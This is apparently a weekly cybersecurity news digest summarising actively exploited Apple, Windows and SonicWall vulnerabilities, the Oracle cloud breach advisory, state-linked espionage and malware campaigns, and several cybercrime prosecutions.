Apple has released critical security updates for iOS, iPadOS, macOS Sequoia, tvOS, and visionOS to address two zero-day vulnerabilities actively exploited in the wild. The first flaw, CVE-2025-31200, is a memory corruption issue in the Core Audio framework that could allow arbitrary code execution via malicious media files. The second, CVE-2025-31201, is an improper authentication flaw in the RPAC component, potentially enabling attackers to bypass Pointer Authentication protections. Apple has confirmed that the two vulnerabilities have been used in highly targeted attacks.
A recently patched Windows NTLM vulnerability, tracked as CVE-2025-24054, has been exploited in attacks targeting both government and private institutions. The flaw allows attackers to disclose NTLM hashes and potentially perform spoofing attacks over a network with minimal user interaction. Within a week after the patch was released, attackers began exploiting the vulnerability in campaigns targeting institutions in Poland and Romania, as reported by Check Point. Researchers observed several campaigns between March 19 and March 25, including those linked to Russian threat actors and APT groups. The US Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) list. The agency has also flagged a SonicWall SMA100 Appliances OS command injection flaw (CVE-2021-20035) as actively exploited.
Additionally, CISA is advising organizations affected by a possible data breach at Oracle’s Cloud Infrastructure to reset passwords to reduce the risk of credential compromise. CISA has acknowledged reports of potential unauthorized access to a legacy Oracle cloud environment, though the full scope and impact remain unconfirmed. Earlier, news media reported that throughout March and April, Oracle informed its customers privately about multiple security incidents, although the company did not publicly address the matter. Oracle claimed that its Cloud Infrastructure (OCI) was not breached, but acknowledged that a hacker accessed and published user names from two outdated servers not connected to OCI.
Fortinet has issued an advisory alerting users about a new post-exploitation technique being used by threat actors to maintain persistent read-only access to previously compromised FortiGate VPN devices, even after the original attack vector was patched. The company said that the technique, which exploits older known vulnerabilities (CVE-2024-21762, CVE-2023-27997, and CVE-2022-42475), allows attackers to maintain access to sensitive parts of a compromised device’s file system, despite system updates that address the original flaws.
A group of longtime CVE Board members has launched the CVE Foundation, a new non-profit organization aimed at ensuring the long-term stability and independence of the Common Vulnerabilities and Exposures (CVE) Program. The move comes in response to MITRE Vice President Yosry Barsoum's warning that funding for both the CVE and Common Weakness Enumeration (CWE) programs is set to expire on April 16, 2025, potentially disrupting global cybersecurity efforts. In the meanwhile, CISA said that it extended the option period on the contract to ensure that there will be no lapse in critical CVE services.
A new spear-phishing campaign attributed to Russian state-sponsored hacking group Midnight Blizzard (also known as Cozy Bear or APT29) has been discovered targeting European diplomatic entities, including embassies, according to cybersecurity firm Check Point Research. The campaign, active since January 2025, employs a deceptive email disguised as a wine-tasting event invitation from a spoofed Ministry of Foreign Affairs address. The phishing emails include a malicious link that, when clicked under specific conditions, delivers a ZIP archive titled wine.zip. If the conditions aren't met, the victim is redirected to a legitimate government site, adding credibility to the ruse.
A China-linked cyber espionage group, UNC5174 (aka Uteus or Uetus) has been linked to a new malware campaign targeting Linux systems using a modified variant of the known SNOWLIGHT malware and a new, open-source remote access tool dubbed VShell. At the same time, the Canadian Cyber Centre has warned it observed increasing levels of Chinese threat actor activity, including activity associated to SALT TYPHOON, targeting network edge routers across critical infrastructure sectors.
Researchers at Trend Micro have uncovered a previously undocumented controller component associated with the BPFDoor backdoor malware involved in ongoing cyber attacks targeting critical sectors across Asia and the Middle East. The controller has been linked to a string of intrusions targeting telecommunications, finance, and retail industries in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt throughout 2024. The campaign is attributed to a well-known cyber espionage group known as Earth Bluecrow, also tracked as DecisiveArchitect, Red Dev 18, and Red Menshen.
A new remote access trojan, dubbed ‘ResolverRAT’, targets organizations in the healthcare and pharmaceutical industries, according to a report released by Morphisec Threat Labs. The malware combines advanced in-memory execution with layered evasion techniques, making it particularly difficult to detect and analyze. Unlike well-known malware families such as Rhadamanthys or Lumma, ResolverRAT comes with a unique loader and payload architecture, while reusing elements from previous campaigns, including phishing infrastructure and binary components.
China has accused the United States National Security Agency (NSA) of orchestrating "advanced" cyberattacks targeting critical infrastructure during the Asian Winter Games held in February 2025. According to China's state-run news agency Xinhua, authorities in the northeastern city of Harbin—where the Games took place—identified three NSA agents allegedly involved in the operation. Xinhua reported that the cyberattacks targeted essential pre-Games systems, including platforms managing athlete registration, arrival and departure logistics, and competition entries. The systems stored a vast trove of sensitive personal data related to participants, staff, and officials.
A threat actor with suspected links to Pakistan tracked as SideCopy has expanded its cyberattacks targeting Indian sectors, deploying a range of remote access trojans (RATs), including Xeno RAT, Spark RAT, and a new malware, CurlBack RAT. Recent attacks involved additional RATs like Action RAT, ReverseRAT, and Cheex, which is designed to steal documents and images. The group also utilized to siphon data from USB drives and a .NET-based Geta RAT that executes up to 30 remote commands.
Palo Alto Networks' Unit 42 uncovered a sophisticated phishing campaign that uses a multi-stage attack chain to deliver malware such as Agent Tesla, Remcos RAT, and XLoader. The attackers employ complex delivery techniques to evade detection and bypass traditional security measures. The campaign uses deceptive emails, disguised as order release requests, to lure victims into opening malicious attachments, ultimately enabling successful payload execution.
A new phishing technique has been observed that specifically targets high-value online accounts, making stolen credentials more usable and difficult to detect. Known as “precision-validating phishing,” the technique is designed to engage only with verified, legitimate email addresses.
Cisco Talos said it observed the continued global spread of the XorDDoS distributed denial-of-service (DDoS) malware between November 2023 and February 2025. Notably, over 70% of XorDDoS attacks during this period targeted the United States. Analysis of the malware’s multi-layer controller, builder, and binding tools suggests the operators are Chinese-speaking. Talos also uncovered a new, more advanced variant of the controller, dubbed the “VIP version,” which was used to construct a more sophisticated and expansive DDoS botnet.
The Zscaler ThreatLabz team published a two-part series detailing new activity linked to the China-sponsored espionage group Mustang Panda. The investigation revealed updated variants of the ToneShell backdoor and a previously undocumented tool called StarProxy. ToneShell now includes enhancements to its FakeTLS command-and-control (C2) protocol and client ID handling. StarProxy, a new lateral movement tool, also uses the FakeTLS protocol to proxy attacker traffic. Mustang Panda continues to focus on entities in Myanmar and typically employs DLL sideloading techniques using RAR archives bundled with legitimate, signed binaries.
Zak Coyne, 23, from Huddersfield, has been sentenced to eight-and-a-half years in prison by Manchester Crown Court for running LabHost, a criminal service launched in 2021 that enabled cybercriminals to create phishing websites to steal personal and financial information. Coyne pleaded guilty to several cybercrime charges, including supplying articles for fraud, encouraging fraud, and transferring criminal property.
Ukrainian police have dismantled a criminal group that remotely accessed the devices of state enforcement officers and private notaries to illegally lift property restrictions for a fee. The group, including a private enforcement officer, used phishing emails containing malware to compromise victims' devices, gaining access to digital signatures and passwords. Their goal was to facilitate illegal property transfers by deregistering and re-registering movable and immovable property. The group operated discreetly, using specialized tools and working in remote areas to avoid detection.
Behrouz Parsarad, the founder and operator of Nemesis Market, a dark web marketplace for illegal drugs and criminal services has been charged in the United States. Launched in March 2021, Nemesis Market quickly gained traction, reaching over 150,000 users and 1,100 vendor accounts worldwide. Between 2021 and 2024, it processed more than 400,000 orders, including significant quantities of illegal drugs such as methamphetamine, cocaine, fentanyl, heroin, and oxycodone. The marketplace also facilitated the sale of stolen financial information, fraudulent IDs, counterfeit currencies, and malware.
Minh Phuong Ngoc Vong, a 40-year-old man from Bowie, Maryland, pleaded guilty to defrauding 13 US companies by securing remote IT jobs and allowing individuals in China to perform the work. Vong falsely claimed to have a Bachelor’s degree and 16 years of software development experience to land the positions. He installed remote access software to let foreign nationals, including one in Shenyang, China, work under his name. From March to July 2023, Vong facilitated over $28,000 in wages from a Virginia-based company, which he shared with the overseas conspirators. Vong engaged in similar schemes between 2021 and 2024.
